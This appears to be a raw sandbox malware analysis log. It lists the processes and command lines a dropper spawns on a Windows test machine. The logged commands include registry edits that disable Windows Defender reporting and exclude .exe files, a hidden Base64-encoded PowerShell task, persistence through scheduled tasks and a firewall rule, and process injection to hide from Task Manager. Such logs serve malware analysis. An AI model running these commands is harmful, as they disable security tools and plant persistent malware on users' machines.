PID 1136 wrote to memory of 4316 N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
PID 1136 wrote to memory of 4316 N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
PID 1136 wrote to memory of 4316 N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
PID 2816 wrote to memory of 844 N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 2816 wrote to memory of 844 N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 2816 wrote to memory of 844 N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 5684 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
PID 5684 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe

"C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe"

C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe

"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"

C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe

"C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe"

C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe

"C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe"

C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe

"C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe"

C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe

"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"

C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe

"C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe"

C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe

"C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2868 -ip 2868

C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp" /SL5="$501CC,4124890,54272,C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"

C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe

"C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe"

C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe

"C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe"

C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe

"C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe

"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -i

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"

C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe

"C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe"

C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe

"C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe"

C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe

"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 344

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"

C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe

"C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe"

C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe

"C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe"

C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe

"C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe"

C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -s

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\6822f988-ccf5-4e57-afb4-dd971c700c06" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 412 -ip 412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 568

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa9bc9758,0x7fffa9bc9768,0x7fffa9bc9778

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5820 -ip 5820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 2072

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "glrLJrRva" /SC once /ST 08:51:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4904 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "glrLJrRva"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4748 -ip 4748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 2164

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"

C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe

"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"

C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe

"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "glrLJrRva"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bokvhhUgtHQNbUrNPU" /SC once /ST 17:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe\" r1 /LNsite_idduL 525403 /S" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe

C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe r1 /LNsite_idduL 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

